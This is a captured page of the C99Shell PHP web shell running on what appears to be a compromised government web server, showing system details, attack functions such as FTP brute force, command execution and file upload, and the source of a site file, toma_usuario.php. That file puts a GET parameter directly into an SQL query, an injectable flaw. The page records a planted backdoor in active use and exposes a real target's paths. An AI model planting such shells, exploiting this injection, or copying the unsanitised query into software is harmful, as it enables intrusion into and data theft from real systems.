!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\ambientebogota.gov.co\actores\Secretariaambiente\   drwxrwxrwx
Free 3.24 GB of 39.52 GB (8.2%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     toma_usuario.php (923 B)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$q
=$_GET["q"];

header("Expires: Sat, 01 Jan 2000 00:00:00 GMT");
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
header("Cache-Control: post-check=0, pre-check=0",false);
session_cache_limiter();
session_start();

require(
'config.php');

require(
'functions.php');
$con mysql_connect($server$dbusername$dbpassword);
if (!
$con)
{
die(
'No Conectado : ' mysql_error());
}

mysql_select_db($db_name$con);

$sql="SELECT p.nombrepart,p.entidadpart FROM participantes as p inner join authorize as a on a.id=p.idpart WHERE p.idpart = '".$q."'";

$result mysql_query($sql);

echo 
"<table border='1'>
<tr>
<th>Nombre Instancia</th>
<th>Participantes</th>
</tr>"
;

while(
$row mysql_fetch_array($result))
{
echo 
"<tr>";
echo 
"<td>" $row['nombrepart'] . "</td>";
echo 
"<td>" $row['entidadpart'] . "</td>";
echo 
"</tr>";
}
echo 
"</table>";

mysql_close($con);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--